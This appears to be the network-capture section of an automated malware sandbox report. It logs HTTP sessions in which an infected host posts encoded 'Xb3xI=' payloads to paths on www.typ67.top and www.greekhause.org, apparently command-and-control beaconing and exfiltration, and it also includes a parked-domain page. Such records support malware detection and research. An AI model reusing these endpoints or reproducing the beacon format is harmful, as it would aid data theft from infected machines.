                                                                                  Data Raw: 32 39 38 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 61 6c 62 65 72 6f 2d 64 76 65 72 69 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 [TRUNCATED]
                                                                                  Data Ascii: 298a<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.albero-dveri.online</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text"> &nbsp;<a class="b-link" href="https://r [TRUNCATED]
                                                                                  Sep 25, 2024 10:00:15.489656925 CEST1289INData Raw: 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 74 79 70 65 5f 68 6f 73 74 69 6e 67 2d 73 74 61 74 69 63 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22
                                                                                  Data Ascii: ent-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.albero-dveri.online</h1><p class="b-parking__header-description b-text">
                                                                                  Sep 25, 2024 10:00:15.489670992 CEST1289INData Raw: 2d 69 74 65 6d 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 69 74 65 6d 5f 74 79 70 65 5f 68 6f 73 74 69 6e 67 2d 6f 76 65 72 61 6c 6c 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 68 65 61
                                                                                  Data Ascii: -item b-parking__promo-item_type_hosting-overall"><div class="b-parking__promo-header"><span class="b-parking__promo-image b-parking__promo-image_type_hosting"></span><div class="l-margin_left-large"><strong class="b-title b-title_size_large-c
                                                                                  Sep 25, 2024 10:00:15.489682913 CEST1289INData Raw: 6f 6e 5f 74 65 78 74 2d 73 69 7a 65 5f 6e 6f 72 6d 61 6c 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 62 75 74 74 6f 6e 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 62 75 74 74 6f 6e 5f 74 79 70 65 5f 68 6f 73 74 69 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a
                                                                                  Data Ascii: on_text-size_normal b-parking__button b-parking__button_type_hosting" href="https://www.reg.ru/hosting/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_land_host&amp;reg_source=parking_auto"> </
                                                                                  Sep 25, 2024 10:00:15.489695072 CEST1289INData Raw: 69 7a 65 5f 6c 61 72 67 65 2d 63 6f 6d 70 61 63 74 22 3e d0 93 d0 be d1 82 d0 be d0 b2 d1 8b d0 b5 20 d1 80 d0 b5 d1 88 d0 b5 d0 bd d0 b8 d1 8f 20 d0 bd d0 b0 26 6e 62 73 70 3b 43 4d 53 3c 2f 73 74 72 6f 6e 67 3e 3c 70 20 63 6c 61 73 73 3d 22 62
                                                                                  Data Ascii: ize_large-compact"> &nbsp;CMS</strong><p class="b-text b-parking__promo-description"> &nbsp;CMS &nbsp;
                                                                                  Sep 25, 2024 10:00:15.489706039 CEST1289INData Raw: 67 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 73 5f 6c 61 6e 64 5f 62 75 69 6c 64 26 61 6d 70 3b 72 65 67 5f 73 6f 75 72 63 65 3d 70 61 72 6b 69 6e 67 5f 61 75 74 6f 22 3e d0 97 d0 b0 d0 ba d0 b0 d0 b7 d0 b0 d1 82 d1 8c 3c 2f 61 3e 3c 2f 64 69 76
                                                                                  Data Ascii: g&utm_campaign=s_land_build&amp;reg_source=parking_auto"></a></div><div class="b-parking__promo-item b-parking__ssl-protection"><span class="b-parking__promo-image b-parking__promo-image_type_ssl l-margin_right-large"></span> <
                                                                                  Sep 25, 2024 10:00:15.489717007 CEST1289INData Raw: 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 61 72 74 69 63 6c 65 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 6a 73 27 29
                                                                                  Data Ascii: div></div></article><script onload="window.trackScriptLoad('parking-rdap-auto.js')" onerror="window.trackScriptLoad('parking-rdap-auto.js', 1)" src="parking-rdap-auto.js" charset="utf-8"></script><script>function ondata(data){ if (
                                                                                  Sep 25, 2024 10:00:15.489727974 CEST1289INData Raw: 41 6c 6c 28 20 27 73 70 61 6e 2e 70 75 6e 79 2c 20 73 70 61 6e 2e 6e 6f 2d 70 75 6e 79 27 20 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 20 3d 20 27 74 65 78 74 43 6f 6e 74 65 6e 74 27 20 69 6e 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 20 3f
                                                                                  Data Ascii: All( 'span.puny, span.no-puny' ), t = 'textContent' in document.body ? 'textContent' : 'innerText'; var domainName = document.title.match( /(xn--|[0-9]).+\.(xn--)[^\s]+/ )[0]; if ( domainName ) { var d
                                                                                  Sep 25, 2024 10:00:15.489829063 CEST485INData Raw: 65 45 6c 65 6d 65 6e 74 28 74 29 2c 61 3d 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 74 29 5b 30 5d 2c 6b 2e 61 73 79 6e 63 3d 31 2c 6b 2e 73 72 63 3d 72 2c 61 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65
                                                                                  Data Ascii: eElement(t),a=e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)}) (window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym"); ym(54200914, "init", { clickmap:true, trackLinks:true,


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  87192.168.11.204984338.47.207.14680
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 10:00:20.834908009 CEST801OUTPOST /qjs8/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.typ67.top
                                                                                  Origin: http://www.typ67.top
                                                                                  Referer: http://www.typ67.top/qjs8/
                                                                                  Content-Length: 202
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 54 68 67 47 5a 49 58 54 72 6d 4e 33 7a 2f 71 4c 33 7a 30 33 6c 41 54 33 54 30 77 56 50 39 6f 41 4f 4d 65 41 63 62 48 4e 7a 68 39 45 35 71 35 32 38 76 42 78 41 75 74 7a 4b 74 36 38 74 30 53 71 43 43 50 66 34 42 71 5a 6c 72 31 64 52 54 34 2b 50 43 41 36 59 5a 67 31 34 6e 59 74 66 72 78 51 41 78 43 51 72 44 4d 59 6f 79 4e 5a 47 38 59 69 66 36 4b 50 30 2f 5a 46 31 63 35 79 62 76 52 43 44 56 55 75 6f 43 39 35 57 59 67 78 64 76 31 6e 4a 4f 41 55 38 50 5a 31 6b 76 4d 78 76 5a 48 64 55 77 58 7a 71 61 4b 78 73 38 53 4f 42 32 32 50 5a 7a 32 53 58 44 41 44 70 46 38 4b 51 33 48 4e 5a 41 3d 3d
                                                                                  Data Ascii: Xb3xI=ThgGZIXTrmN3z/qL3z03lAT3T0wVP9oAOMeAcbHNzh9E5q528vBxAutzKt68t0SqCCPf4BqZlr1dRT4+PCA6YZg14nYtfrxQAxCQrDMYoyNZG8Yif6KP0/ZF1c5ybvRCDVUuoC95WYgxdv1nJOAU8PZ1kvMxvZHdUwXzqaKxs8SOB22PZz2SXDADpF8KQ3HNZA==
                                                                                  Sep 25, 2024 10:00:21.165018082 CEST302INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 25 Sep 2024 08:00:21 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 138
                                                                                  Connection: close
                                                                                  ETag: "66b1b463-8a"
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  88192.168.11.204984438.47.207.14680
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 10:00:23.688252926 CEST821OUTPOST /qjs8/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.typ67.top
                                                                                  Origin: http://www.typ67.top
                                                                                  Referer: http://www.typ67.top/qjs8/
                                                                                  Content-Length: 222
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 54 68 67 47 5a 49 58 54 72 6d 4e 33 38 36 69 4c 79 51 63 33 6a 67 54 30 4b 30 77 56 57 4e 6f 62 4f 4d 69 41 63 61 44 64 7a 7a 5a 45 34 50 46 32 39 74 35 78 4e 4f 74 7a 53 39 36 31 6a 55 53 31 43 43 44 74 34 42 6d 5a 6c 72 78 64 52 54 6f 2b 50 7a 41 39 5a 4a 67 37 6b 6e 59 72 43 37 78 51 41 78 43 51 72 44 4a 51 6f 79 56 5a 47 49 63 69 66 66 6d 4d 33 2f 59 33 6a 4d 35 79 66 76 52 47 44 56 55 59 6f 44 67 63 57 64 6b 78 64 75 46 6e 49 62 73 54 32 50 5a 7a 70 50 4e 43 67 72 53 51 63 51 76 56 76 39 75 35 6a 75 6d 46 41 67 6e 56 45 42 43 32 55 51 63 78 74 31 46 69 53 31 47 57 45 50 4f 6a 4c 4f 39 46 38 4e 64 46 62 69 4e 64 62 2f 31 61 69 46 73 3d
                                                                                  Data Ascii: Xb3xI=ThgGZIXTrmN386iLyQc3jgT0K0wVWNobOMiAcaDdzzZE4PF29t5xNOtzS961jUS1CCDt4BmZlrxdRTo+PzA9ZJg7knYrC7xQAxCQrDJQoyVZGIciffmM3/Y3jM5yfvRGDVUYoDgcWdkxduFnIbsT2PZzpPNCgrSQcQvVv9u5jumFAgnVEBC2UQcxt1FiS1GWEPOjLO9F8NdFbiNdb/1aiFs=
                                                                                  Sep 25, 2024 10:00:24.011989117 CEST302INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 25 Sep 2024 08:00:23 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 138
                                                                                  Connection: close
                                                                                  ETag: "66b1b463-8a"
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  89192.168.11.204984538.47.207.14680
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 10:00:26.541857958 CEST1289OUTPOST /qjs8/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.typ67.top
                                                                                  Origin: http://www.typ67.top
                                                                                  Referer: http://www.typ67.top/qjs8/
                                                                                  Content-Length: 7370
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 54 68 67 47 5a 49 58 54 72 6d 4e 33 38 36 69 4c 79 51 63 33 6a 67 54 30 4b 30 77 56 57 4e 6f 62 4f 4d 69 41 63 61 44 64 7a 7a 52 45 34 39 39 32 39 4b 56 78 43 75 74 7a 62 64 36 77 6a 55 53 38 43 42 7a 70 34 42 36 7a 6c 74 74 64 51 77 77 2b 48 6e 55 39 41 35 67 37 76 48 59 71 66 72 78 46 41 78 53 4d 72 44 5a 51 6f 79 56 5a 47 4f 77 69 57 71 4b 4d 78 2f 5a 46 31 63 35 75 62 76 52 36 44 56 73 49 6f 44 56 70 56 75 73 78 63 4f 56 6e 4f 74 34 54 36 50 5a 78 73 50 4e 61 67 72 50 51 63 52 44 52 76 39 7a 73 6a 70 61 46 43 6e 47 78 55 6c 65 53 43 47 52 36 68 56 56 6d 46 6a 50 64 45 4e 69 4b 50 65 64 79 7a 6f 46 4c 52 7a 52 38 63 4f 35 78 32 42 75 75 69 55 33 6c 49 37 45 46 4c 31 74 57 53 39 63 32 78 64 73 30 49 79 71 76 68 6a 31 48 6b 79 52 2f 6a 6c 69 75 56 76 51 30 33 77 77 48 6c 76 57 38 71 6f 35 30 48 53 39 6c 61 68 5a 68 38 56 61 33 59 38 75 79 74 59 59 49 30 6c 56 49 4c 56 46 72 50 34 48 2b 2f 4c 76 47 77 39 69 37 4c 4e 30 65 43 32 71 43 76 55 77 6c 36 43 48 32 35 52 39 4f 57 6a 48 43 [TRUNCATED]
                                                                                  Data Ascii: Xb3xI=ThgGZIXTrmN386iLyQc3jgT0K0wVWNobOMiAcaDdzzRE49929KVxCutzbd6wjUS8CBzp4B6zlttdQww+HnU9A5g7vHYqfrxFAxSMrDZQoyVZGOwiWqKMx/ZF1c5ubvR6DVsIoDVpVusxcOVnOt4T6PZxsPNagrPQcRDRv9zsjpaFCnGxUleSCGR6hVVmFjPdENiKPedyzoFLRzR8cO5x2BuuiU3lI7EFL1tWS9c2xds0Iyqvhj1HkyR/jliuVvQ03wwHlvW8qo50HS9lahZh8Va3Y8uytYYI0lVILVFrP4H+/LvGw9i7LN0eC2qCvUwl6CH25R9OWjHCO4XkJLM8ZRB0VY8YspLIqcTnw+1OEROyGubT0MQZW8v2/QNZnxm0ZJZt+CBdwl82pfNFtbD2qt4hNgNgbDpb/N3FDrGfupmkanNH6ZjyX46NhZu7zvZfm0fbwc2ckrsDV09OBGOk6Qh17Mwi4rLWYB9g1QNULoVfg6kaBMM5xdBjv2XPZOpmE1i0cv0higHSS9AeS3fUYfPCQDFpRxWigflZ0ZbQnuQ+BuKpimW/0xtVSzclHj0KB58NmkgmWkeE0R0VNSp8jqIS9EYvfTzR4QWIY7mLiQSnI4k0WuqtzBB83KqKUTPttvnj+b7BAPAcjA4E3aEd1+a625Up5Q+ozlwJi8xd1cS
                                                                                  Sep 25, 2024 10:00:26.541893005 CEST5156OUTData Raw: 44 2b 50 54 66 71 42 67 36 57 71 39 6b 4b 66 66 4f 36 57 35 6d 58 66 69 66 2b 4d 51 46 52 51 53 4f 6c 41 56 6f 4b 70 68 51 68 54 49 72 5a 37 73 43 4f 41 48 48 4f 6b 44 77 4f 68 39 33 2f 49 4d 61 62 44 4a 51 51 58 2b 51 36 6f 43 4f 71 73 6c 47 38
                                                                                  Data Ascii: D+PTfqBg6Wq9kKffO6W5mXfif+MQFRQSOlAVoKphQhTIrZ7sCOAHHOkDwOh93/IMabDJQQX+Q6oCOqslG8kQDhWgy0pcOPjrv0yjQUiwXALS4TxA+NXKfo0iXNeX+jwcfeqTbJCmx3Q5gGynVKKWmDER1mnWlUXYqAujtb0/seXbnjU5Ggvj9aOm2SbpAxDgHhCkstYoJ0k+KVJEe2NJC1/dodBZc/8E+QFCt1j9I6YLCF1o4Lz
                                                                                  Sep 25, 2024 10:00:26.541949987 CEST1289OUTData Raw: 4c 42 48 69 34 6f 4a 76 35 36 6f 63 2b 48 4c 63 6f 2f 53 79 53 31 59 61 66 6f 61 67 69 4d 59 54 57 68 66 59 6c 68 79 41 62 43 77 41 6d 37 4d 31 62 65 46 71 66 45 55 46 36 38 78 75 30 64 2b 69 65 54 53 68 52 77 4a 45 31 73 55 57 74 45 57 51 42 45
                                                                                  Data Ascii: LBHi4oJv56oc+HLco/SyS1YafoagiMYTWhfYlhyAbCwAm7M1beFqfEUF68xu0d+ieTShRwJE1sUWtEWQBEs3N91R1Y1sEoVIUMaLF/m6NMmKnm9o0b0ZCgTyng6xt1s3f/XpXg8Ncpipn6BYO7U/vlsh4TZ4i74Gt051ei5nhS7dFIBDekhbJyAHp8akxMvJWsE0yxHlaJRIqMBj/OL5jeYdeECWZA4wi3h8x5ortXagQREsAZh
                                                                                  Sep 25, 2024 10:00:26.542052984 CEST236OUTData Raw: 6b 6b 62 6c 77 6e 66 74 43 66 73 72 51 34 2f 55 2f 54 6c 34 6d 38 4e 55 4c 48 78 52 51 6a 63 45 49 58 61 5a 70 4f 6c 4b 77 47 46 70 39 71 2b 67 4e 42 6b 43 5a 67 6f 6d 31 61 76 78 33 38 5a 6a 32 67 44 32 38 53 6b 69 70 73 76 32 31 56 35 2b 32 5a
                                                                                  Data Ascii: kkblwnftCfsrQ4/U/Tl4m8NULHxRQjcEIXaZpOlKwGFp9q+gNBkCZgom1avx38Zj2gD28Skipsv21V5+2ZLh6NHcn09jG1L3r4MAgRYzdaJ/9TdHRqRgLbeHW4f13QR3mHBCiNofWaHvB7YebqXHLnWRr4f1dadqhnQFgu5Br//olnYPRqBSarePjUNibRwxsOYe7i6Yb3Q8i0THPlkQZZ7m7+mK5/+4avh4RTv2HQ==
                                                                                  Sep 25, 2024 10:00:26.863286972 CEST302INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 25 Sep 2024 08:00:26 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 138
                                                                                  Connection: close
                                                                                  ETag: "66b1b463-8a"
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  90192.168.11.204984638.47.207.14680
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 10:00:29.395265102 CEST543OUTGET /qjs8/?Xb3xI=ejIma/W1pGRFx7ChnTgroDHkNn1VdqZgcszQV8LCwj4556o206I/YZ5OId3qzm2jECDslwuStodYNwU7Ng5KBO4as1dQdJVJJimzghFMohwqM9lhe6W/0oM=&O4bP=9dRH6ZfHbJX HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.typ67.top
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 10:00:29.723455906 CEST302INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 25 Sep 2024 08:00:29 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 138
                                                                                  Connection: close
                                                                                  ETag: "66b1b463-8a"
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  91192.168.11.20498473.33.130.19080
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 10:00:34.850064039 CEST816OUTPOST /phvf/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.greekhause.org
                                                                                  Origin: http://www.greekhause.org
                                                                                  Referer: http://www.greekhause.org/phvf/
                                                                                  Content-Length: 202
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 5a 71 41 4b 68 6a 48 44 71 58 64 35 72 51 58 4c 6e 58 46 45 75 59 4a 41 34 65 63 77 64 4e 2b 61 47 50 30 5a 31 4e 73 64 46 73 74 4c 52 65 64 52 63 42 44 62 38 43 72 62 41 6b 6a 75 6e 42 7a 79 48 36 47 6c 2f 70 62 6e 46 53 6b 4a 51 57 59 43 62 64 76 74 76 49 30 59 33 49 53 51 64 52 76 48 6b 79 62 34 78 49 49 79 79 4e 73 79 31 52 6b 46 6f 46 58 47 53 62 31 6f 63 33 66 70 6e 66 79 68 4b 75 58 6f 37 6c 41 4c 32 44 71 66 49 55 31 57 6d 46 31 74 44 36 58 5a 4a 65 38 6b 51 44 56 78 31 49 77 42 50 66 41 61 57 69 48 6f 55 55 58 63 59 6e 6d 6a 73 6b 64 51 37 57 56 78 4f 6a 69 31 55 67 3d 3d
                                                                                  Data Ascii: Xb3xI=ZqAKhjHDqXd5rQXLnXFEuYJA4ecwdN+aGP0Z1NsdFstLRedRcBDb8CrbAkjunBzyH6Gl/pbnFSkJQWYCbdvtvI0Y3ISQdRvHkyb4xIIyyNsy1RkFoFXGSb1oc3fpnfyhKuXo7lAL2DqfIU1WmF1tD6XZJe8kQDVx1IwBPfAaWiHoUUXcYnmjskdQ7WVxOji1Ug==


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  92192.168.11.20498483.33.130.19080
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 10:00:37.491004944 CEST836OUTPOST /phvf/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.greekhause.org
                                                                                  Origin: http://www.greekhause.org
                                                                                  Referer: http://www.greekhause.org/phvf/
                                                                                  Content-Length: 222
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 5a 71 41 4b 68 6a 48 44 71 58 64 35 35 6a 2f 4c 68 77 52 45 2f 34 4a 50 30 2b 63 77 57 74 2b 65 47 50 34 5a 31 4a 39 51 46 35 46 4c 51 2b 74 52 64 44 37 62 37 43 72 62 4c 45 6a 72 6a 42 7a 70 48 36 4c 59 2f 6f 33 6e 46 53 41 4a 51 58 49 43 61 75 58 75 39 6f 30 61 39 59 53 4f 5a 52 76 48 6b 79 62 34 78 49 4e 5a 79 4e 6b 79 31 67 55 46 70 67 36 51 65 37 31 72 62 33 66 70 30 50 79 6c 4b 75 57 2f 37 6b 4d 68 32 41 43 66 49 52 4a 57 33 30 31 75 61 4b 58 66 4e 65 39 73 63 68 4d 5a 79 34 63 76 45 50 45 78 54 42 4b 54 52 43 47 47 46 56 53 48 76 33 42 69 2f 6d 73 5a 4d 68 6a 75 4a 6f 45 4a 2b 36 6e 52 75 74 76 7a 64 4a 79 51 71 55 2f 46 55 31 30 3d
                                                                                  Data Ascii: Xb3xI=ZqAKhjHDqXd55j/LhwRE/4JP0+cwWt+eGP4Z1J9QF5FLQ+tRdD7b7CrbLEjrjBzpH6LY/o3nFSAJQXICauXu9o0a9YSOZRvHkyb4xINZyNky1gUFpg6Qe71rb3fp0PylKuW/7kMh2ACfIRJW301uaKXfNe9schMZy4cvEPExTBKTRCGGFVSHv3Bi/msZMhjuJoEJ+6nRutvzdJyQqU/FU10=


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
